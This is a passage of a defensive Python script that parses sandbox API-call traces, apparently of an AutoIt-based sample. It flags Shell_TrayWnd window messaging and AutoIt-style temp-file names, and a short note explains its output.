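class ApiCall:
    name: str          # API name as recorded, e.g. FindWindowW
    module: str        # exporting module, e.g. USER32
    args: List[str]    # raw argument strings; "?" means the sandbox could not resolve it
    ref: int           # address of the call site inside the dumped module
    subcall: bool      # True when the line is attributed to a called subfunction


def parse_api_line(line: str) -> Optional[ApiCall]:
    m = CALL_RE.search(line)
    if not m:
        return None
    name, module, raw_args, ref = m.groups()
    args = [a.strip() for a in raw_args.split(",")] if raw_args.strip() else []
    return ApiCall(name, module.upper(), args, int(ref, 16),
                   "Part of subcall function" in line)


def parse_trace(text: str) -> List[ApiCall]:
    return [c for c in (parse_api_line(line) for line in text.splitlines()) if c]


def as_int(arg: str) -> Optional[int]:
    """Numeric value of an 8-hex-digit argument; None for '?' and for string arguments.
    (An 8-character string made only of hex digits would be misread; none occurs here.)"""
    return int(arg, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", arg) else None


def find_autoit_tempfile(calls: List[ApiCall]) -> List[ApiCall]:
    """GetTempFileName* with prefix 'aut': the temp-file naming used by the AutoIt runtime."""
    return [c for c in calls
            if c.name.startswith("GetTempFileName") and len(c.args) >= 2 and c.args[1] == "aut"]


def find_traywnd_postmessage(calls: List[ApiCall]) -> List[Tuple[ApiCall, ApiCall, Optional[int]]]:
    """FindWindow*('Shell_TrayWnd') followed by the next PostMessage*.
    The third element is the message id, or None when the trace did not resolve it."""
    hits, pending = [], None
    for c in calls:
        if c.name.startswith("FindWindow") and c.args and c.args[0] == "Shell_TrayWnd":
            pending = c
        elif pending is not None and c.name.startswith("PostMessage"):
            msg = as_int(c.args[1]) if len(c.args) > 1 else None
            hits.append((pending, c, msg))
            pending = None
    return hits


def triage(text: str) -> List[Tuple[str, int, str]]:
    """Run both rules over a trace; returns (rule, call-site address, detail) per hit."""
    calls = parse_trace(text)
    findings = []
    for _fw, pm, msg in find_traywnd_postmessage(calls):
        if msg == WM_COMMAND:
            wparam = as_int(pm.args[2]) if len(pm.args) > 2 else None
            detail = "WM_COMMAND" + (f" wParam=0x{wparam:X}" if wparam is not None else "")
        elif msg is None:
            # Only the hWnd argument was recorded (second block): report the gap,
            # do not claim WM_COMMAND for it.
            detail = "message id unresolved in trace"
        else:
            detail = f"message 0x{msg:X}"
        findings.append(("shell_traywnd_postmessage", pm.ref, detail))
    for c in find_autoit_tempfile(calls):
        findings.append(("autoit_tempfile_prefix", c.ref, "GetTempFileNameW prefix 'aut'"))
    return findings


if __name__ == "__main__":
    for rule, ref, detail in triage(SAMPLE_TRACE):
        print(f"{rule:28s} ref {ref:08X}  {detail}")
```

Running the block prints one finding per rule hit, keyed by the `ref:` call-site address, so each can be looked up in the corresponding function block above. The pairing rule is deliberately permissive about which `PostMessageW` arguments are present; when extending it to other traces, treat an unresolved message id as a lower-confidence hit rather than a miss.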